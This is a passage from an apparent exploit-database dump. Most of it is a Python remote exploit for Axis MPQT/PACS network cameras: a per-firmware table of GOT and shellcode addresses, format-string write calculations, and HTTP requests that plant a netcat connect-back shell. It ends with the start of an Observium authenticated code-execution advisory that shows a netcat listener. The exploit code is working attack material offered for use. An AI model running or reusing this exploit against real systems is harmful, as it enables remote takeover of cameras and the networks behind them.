\n# Tested with execstack to set executable stack flag bit on bin's and lib's \n# \n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. 
\n# \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.50x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1e7c8, # .bss shellcode address \n93, # 1st POP's \n1, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.55x': [ # \n0x1c15c, # Adjust to GOT free() address \n0x1e834, # .bss shellcode address \n59, # 1st POP's \n80, # 2nd POP's \n'axis', # Aligns injected code \n800, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# \n# Using direct parameter access format string, AKA 'New Style' \n# \n# MPQT \n'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) \n0x1c1b4, # Adjust to GOT free() address \n0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.2x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.4x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'ARM-NCSH-5.5x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.6x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" 
\n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.7x': [ # \n0x1c1c0, # Adjust to GOT free() address \n0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n132, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# Will go in endless loop after exit of nc shell... DoS sux \n# MPQT \n'ARM-NCSH-5.8x': [ # \n0x1b39c, # Adjust to GOT free() address \n0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n98, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-6.1x': [ # \n0x1d2a4, # Adjust to GOT free() address \n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n106, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'CRISv32-5.5x': [ # \n0x8d148, # Adjust to GOT free() address \n0x8f5a8, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.4x': [ # \n0x8d0e0, # Adjust to GOT free() address \n0x8f542, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.2x': [ # \n0x8d0b4, # Adjust to GOT free() address \n0x8f4d6, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.20.0': [ # \n0x8d0e4, # Adjust to GOT free() address \n0x8f546, # .bss shellcode address \n4, # 1st POP's 
\n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n] \n \n \n} \n \nif self.target == 0: \nreturn target_db \n \nif not self.target in target_db: \nprint \"[!] Unknown FMS key: %s!\" % self.target \nsys.exit(1) \n \nif self.verbose: \nprint \"[Verbose] Number of availible FMS keys:\",len(target_db) \n \nreturn target_db \n \n \n# \n# Validate correctness of HOST, IP and PORT \n# \nclass Validate: \n \ndef __init__(self,verbose): \nself.verbose = verbose \n \n# Check if IP is valid \ndef CheckIP(self,IP): \nself.IP = IP \n \nip = self.IP.split('.') \nif len(ip) != 4: \nreturn False \nfor tmp in ip: \nif not tmp.isdigit(): \nreturn False \ni = int(tmp) \nif i < 0 or i > 255: \nreturn False \nreturn True \n \n# Check if PORT is valid \ndef Port(self,PORT): \nself.PORT = PORT \n \nif int(self.PORT) < 1 or int(self.PORT) > 65535: \nreturn False \nelse: \nreturn True \n \n# Check if HOST is valid \ndef Host(self,HOST): \nself.HOST = HOST \n \ntry: \n# Check valid IP \nsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP \n# Or we check again if it is correct typed IP \nif self.CheckIP(self.HOST): \nreturn self.HOST \nelse: \nreturn False \nexcept socket.error as e: \n# Else check valid DNS name, and use the IP address \ntry: \nself.HOST = socket.gethostbyname(self.HOST) \nreturn self.HOST \nexcept socket.error as e: \nreturn False \n \n \n \nif __name__ == '__main__': \n \n# \n# Help, info and pre-defined values \n# \nINFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]' \nHTTP = \"http\" \nHTTPS = \"https\" \nproto = HTTP \nverbose = False \nnoexploit = False \nlhost = '192.168.0.1' # Default Local HOST \nlport = '31337' # Default Local PORT \nrhost = '192.168.0.90' # Default Remote HOST \nrport = '80' # Default Remote PORT \n# Not needed for the SSI exploit, here for possible future usage. 
\n# creds = 'root:pass' \ncreds = False \n \n# \n# Try to parse all arguments \n# \ntry: \narg_parser = argparse.ArgumentParser( \n# prog=sys.argv[0], \nprog='axis-ssid-PoC.py', \ndescription=('[*]' + INFO + '\\n')) \narg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') \narg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') \narg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') \narg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') \narg_parser.add_argument('--fms', required=False, help='Manual FMS key') \nif creds: \narg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') \narg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') \narg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') \narg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') \narg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') \nargs = arg_parser.parse_args() \nexcept Exception as e: \nprint INFO,\"\\nError: %s\\n\" % str(e) \nsys.exit(1) \n \n# We want at least one argument, so print out help \nif len(sys.argv) == 1: \narg_parser.parse_args(['-h']) \n \nprint \"\\n[*]\",INFO \n \nif args.verbose: \nverbose = args.verbose \n \n# Print out info from dictionary \nif args.dict: \ntarget = FMSdb(rhost,verbose).FMSkey(0) \nprint \"[db] Number of FMS keys:\",len(target) \n \n# Print out detailed info from dictionary \nif verbose: 
\n \nprint \"[db] Target details of FMS Keys availible for manual xploiting\" \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\" \n \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] == 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\" \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] != 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n\" \nelse: \nprint \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\" \nKey = \"\" \nfor tmp in range(0,len(target)): \nKey += sorted(target.keys())[tmp] \nKey += ', ' \nprint '\\n',Key,'\\n' \nsys.exit(0) \n \n# \n# Check validity, update if needed, of provided options \n# \nif args.https: \nproto = HTTPS \nif not args.rport: \nrport = '443' \n \nif creds and args.auth: \ncreds = args.auth \n \nif args.noexploit: \nnoexploit = args.noexploit \n \nif args.rport: \nrport = args.rport \n \nif args.rhost: \nrhost = args.rhost \n \nif args.lport: \nlport = args.lport \n \nif args.lhost: \nlhost = args.lhost \n \n# Check if LPORT is valid \nif not Validate(verbose).Port(lport): \nprint \"[!] Invalid LPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if RPORT is valid \nif not Validate(verbose).Port(rport): \nprint \"[!] 
Invalid RPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if LHOST is valid IP or FQDN, get IP back \nlhost = Validate(verbose).Host(lhost) \nif not lhost: \nprint \"[!] Invalid LHOST\" \nsys.exit(1) \n \n# Check if RHOST is valid IP or FQDN, get IP back \nrhost = Validate(verbose).Host(rhost) \nif not rhost: \nprint \"[!] Invalid RHOST\" \nsys.exit(1) \n \n \n# \n# Validation done, start print out stuff to the user \n# \nif noexploit: \nprint \"[i] Test mode selected, no exploiting...\" \nif args.https: \nprint \"[i] HTTPS / SSL Mode Selected\" \nprint \"[i] Remote target IP:\",rhost \nprint \"[i] Remote target PORT:\",rport \nprint \"[i] Connect back IP:\",lhost \nprint \"[i] Connect back PORT:\",lport \n \nrhost = rhost + ':' + rport \n \n# \n# FMS key is required into this PoC \n# \nif not args.fms: \nprint \"[!] FMS key is required!\" \nsys.exit(1) \nelse: \nKey = args.fms \nprint \"[i] Trying with FMS key:\",Key \n \n# \n# Prepare exploiting \n# \n# Look up the FMS key in dictionary and return pointer for FMS details to use \ntarget = FMSdb(rhost,verbose).FMSkey(Key) \n \nif target[Key][6] == 'NCSH1': \nNCSH1 = target[Key][6] \nNCSH2 = \"\" \nelif target[Key][6] == 'NCSH2': \nNCSH2 = target[Key][6] \nNCSH1 = \"\" \nelse: \nNCSH1 = \"\" \nNCSH2 = \"\" \n \nif Key == 'ARM-NCSH-5.8x': \nprint \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\" \nsys.exit(0) \n \nprint \"[i] Preparing shellcode:\",str(target[Key][6]) \n \n# We don't use url encoded shellcode with Netcat shell \n# This is for MIPS/CRISv32 and ARM shellcode \nif not NCSH1 and not NCSH2: \nFMSdata = target[Key][4] # This entry aligns the injected shellcode \n \n# Building up the url encoded shellcode for sending to the target, \n# and replacing LHOST / LPORT in shellcode to choosen values \n \n# part of first 500 decoded bytes will be overwritten during stage #2, and since \n# there is different 
'tailing' on the request internally, keep it little more than needed, to be safe. \n# Let it be 0x00, just for fun. \nFMSdata += '%00' * target[Key][5] \n \n# Connect back IP to url encoded \nip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) \nip_hex = ip_hex.split() \nIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; \n \n# Let's break apart the hex code of LPORT into two bytes \nport_hex = hex(int(lport))[2:] \nport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) \nport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) \nport_hex = port_hex.split() \n \nif (target[Key][6]) == 'MIPSel': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%ff\" \nPP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'CRISv32': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelse: \nprint \"[!] Unknown shellcode! 
(%s)\" % str(target[Key][6]) \nsys.exit(1) \n \n# Replace LHOST / LPORT in URL encoded shellcode \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"IP1\",IP1) \nshell = shell.replace(\"IP2\",IP2) \nshell = shell.replace(\"IP3\",IP3) \nshell = shell.replace(\"IP4\",IP4) \nshell = shell.replace(\"PP0\",PP0) \nshell = shell.replace(\"PP1\",PP1) \nFMSdata += shell \n \n# \n# Calculate the FMS values to be used \n# \n# Get pre-defined values \nALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS \n# POP_SIZE = 8 \nPOP_SIZE = 1 \n \nGOThex = target[Key][0] \nBSShex = target[Key][1] \nGOTint = int(GOThex) \n \n# 'One-Write-Where-And-What' \nif not NCSH1 and not NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) \n \nBSSint = int(BSShex) \nBSSint = (BSSint - GOTint - ALREADY_WRITTEN) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint \n \n# 'Two-Write-Where-And-What' using \"New Style\" \nelif NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat \n \n# Calculate SecondWhat value, so it always is 0x20300 \nSecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nFirstWhat = FirstWhat - len(shell) \n \n# if verbose: \n# print 
\"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \n \n# 'Two-Write-Where-And-What' using \"Old Style\" \nelif NCSH1: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# FirstWhat writes with 4 bytes (Y) (0x0002YYYY) \n# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) \nif BSShex > 0x10000: \nMSB = 1 \nelse: \nMSB = 0 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \n \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) \n \n# Calculate SecondWhat value, so it always is 0x203[00] or [01] \nSecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nGOTint = GOTint - len(shell) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \nelse: \nprint \"[!] 
NCSH missing, exiting\" \nsys.exit(1) \n# \n# Let's start the exploiting procedure \n# \n \n# \n# Stage one \n# \nif NCSH1 or NCSH2: \n \n# \"New Style\" needs to make the exploit in two stages \nif NCSH2: \nFMScode = do_FMS(rhost,verbose) \n# Writing 'FirstWhere' and 'SecondWhere' \n# 1st request \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \n# \n# 1st and 2nd \"Write-Where\" \nFMScode.AddDirectParameterN(POP1) # Write 1st Where \nFMScode.Add(\"XX\") # Jump up two bytes for next address \nFMScode.AddDirectParameterN(POP2) # Write 2nd Where \nFMSdata = FMScode.FMSbuild() \nelse: \nFMSdata = \"\" \n \nprint \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \nelse: \nprint \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \n \n# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM \n# Actually, any valid and public readable .shtml file will work... 
\n# (One of the two below seems always to be usable) \n# \n# For NCSH1 shell, we only check if the remote file is readable, for usage in Stage two \n# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url \n# \ntry: \ntarget_url = \"/httpDisabled.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/httpDisabled.shtml?&http_user=\" \n \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept urllib2.HTTPError as e: \nif e.code == 404: \nprint \"[<] Error\",e.code,e.reason \ntarget_url = \"/view/viewer_index.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/view/viewer_index.shtml?&http_user=\" \nprint \"[>] Using alternative target shtml\" \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept Exception as e: \nif not NCSH2: \nprint \"[!] 
Shellcode delivery failed:\",str(e) \nsys.exit(1) \n# \n# Stage two \n# \n \n# \n# Building and sending the FMS code to the target \n# \nprint \"[i] Building the FMS code...\" \n \nFMScode = do_FMS(rhost,verbose) \n \n# This is a 'One-Write-Where-And-What' for FMS \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x0 | @0x7e818dbc -> [POP1's] \n# 0x0 | @0x7e818dc0 -> [free () GOT address] \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n) \n# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] \n# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n) \n# 0x1 | @0x7e818dd4 \n# \nif not NCSH1 and not NCSH2: \nFMScode.AddPOP(POP1) # 1st series of 'Old Style' POP's \nFMScode.AddADDR(GOTint) # GOT Address \nFMScode.AddWRITEn(1) # 4 bytes Write-Where \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \nFMScode.AddPOP(POP2) # 2nd series of 'Old Style' POP's \nFMScode.AddADDR(BSSint) # BSS shellcode address \nFMScode.AddWRITEn(1) # 4 bytes Write-What \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \n# End of 'One-Write-Where-And-What' \n \n \n# This is a 'Two-Write-Where-And-What' for FMS \n# \n# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" --> \n# We jump over all SSI tagging to end up directly where \"xxx\" will \n# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) \n# \n# The Trick here is to write a lower target address, that we will jump to when calling free(), \n# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT \n# address with two LSB writes. \n# \nelif NCSH2: \n# \n# Direct parameter access for FMS exploitation is really nice and easy to use. \n# However, we need to exploit in two stages with two requests. 
\n# (I was trying to avoid this \"Two-Stages\" as much as possible in this exploit development...) \n# \n# 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) \n# 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" are pointing to. \n# \n# With \"new style\", we can write with POPs independently as we don't depend on the same criteria as in \"NCSH1\", \n# we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write. \n# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818dc8 | \n# 0x76f3d70c | @0x7e818dcc | \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818dd4 \n# [....] \n# 0x1c154 | @0x7e818e10 \n# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818e18 | \n# 0x76f3d70c | @0x7e818e1c | \n# 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818e24 \n# \n \nFMScode.Add(shell) \n \n# \n# 1st and 2nd \"Write-Where\" already done in stage one \n# \n# 1st and 2nd \"Write-What\" \n# \nFMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. \nFMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) \nFMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending on the above calculation \n \nelif NCSH1: \n# Could use direct argument addressing here, but I like to keep \"old style\" as well, \n# as it's another interesting concept. 
\n# \n# Two matching stack contents -> stack address in row w/o or max two POP's between, \n# is needed to write two bytes higher (MSB). \n# \n# \n# Stack Example: \n# \n# Stack Content | @Stack Address (ASLR) \n# \n# 0x9c | @7ef2fde8 -> [POP1's] \n# [....] \n# 0x1 | @7ef2fdec -> [GOTint address] \n#------ \n# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] \n# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) \n# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] \n# ------ | | \n# [....] -> [POP3's] | | \n# 0x7fb99dc | @7ef2fe7c | | \n# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] \n# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) \n# -> [POP4's] | \n# (nil) | @7ef2fe88 | [Count up to 0x20300] \n# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) \n \nFMScode.Add(shell) \n \n# Write FirstWhere for 'FirstWhat' \nFMScode.AddPOP(POP1) \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \nFMScode.AddWRITEn(1) \n \n# Write SecondWhere for 'SecondWhat' \n# \n# This is a special POP with 1 byte, we can POP a maximum of 2! \n# \n# This POP sequence is actually no longer used in this part of the exploit, it was developed to meet the requirement \n# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. \n# Kept as reference as we are now using direct parameter access AKA 'New Style' for 5.2x/5.4x \n# \nif POP2 != 0: \n# We only want to write 'SecondWhat' two bytes higher at free() GOT \nif POP2 > 2: \nprint \"POP2 can't be greater than two!\" \nsys.exit(1) \nif POP2 == 1: \nFMScode.Add(\"%2c\") \nelse: \nFMScode.Add(\"%1c%1c\") \nelse: \nFMScode.Add(\"XX\") \nFMScode.AddWRITEn(1) \n \n# Write FirstWhat pointed by FirstWhere \nFMScode.AddPOP(POP3) # Old Style POP's \nFMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. 
\nFMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) \n \n# Write SecondWhat pointed by SecondWhere \nFMScode.AddPOP(POP4) # Old Style POP's \nFMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending on the above calculation \n \nelse: \nsys.exit(1) \n \nFMSdata = FMScode.FMSbuild() \n \nprint \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata)) \n \n# FMS comes here, and calculations start after '=' in the url \ntry: \nif NCSH1 or NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode \nexcept urllib2.HTTPError as e: \nprint \"[!] Payload delivery failed:\",str(e) \nsys.exit(1) \nexcept Exception as e: \n# 1st string returned by HTTP mode, 2nd by HTTPS mode \nif str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\": \nprint \"[i] Timeout! Payload delivered successfully!\" \nelse: \nprint \"[!] 
Payload delivery failed:\",str(e) \nsys.exit(1) \n \nif noexploit: \nprint \"\\n[*] Not exploiting, no shell...\\n\" \nelse: \nprint \"\\n[*] All done, enjoy the shell...\\n\" \n \n# \n# [EOF] \n# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137941/axismpqtpacs-format.txt"}, {"lastseen": "2016-11-03T10:22:27", "description": "", "published": "2016-04-30T00:00:00", "type": "packetstorm", "title": "Observium 0.16.7533 Code Execution / Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-30T00:00:00", "id": "PACKETSTORM:136859", "href": "https://packetstormsecurity.com/files/136859/Observium-0.16.7533-Code-Execution-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit title: Observium Commercial - Authenticated RCE \n# Author: Dolev Farhi \n# Contact: dolevf at protonmail.com \n# Date: 28-04-2016 \n# Vendor homepage: http://observium.org/ \n# Software version: CE 0.16.7533 \n \nAuthenticated remote code execution \nUsing either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 \nusing any user on Observium (even low privileged) we can trigger code execution. For example, setting up a listener: \n \nroot@pt:~# nc -lvp 4444 \nlistening on [any] 4444 ... 
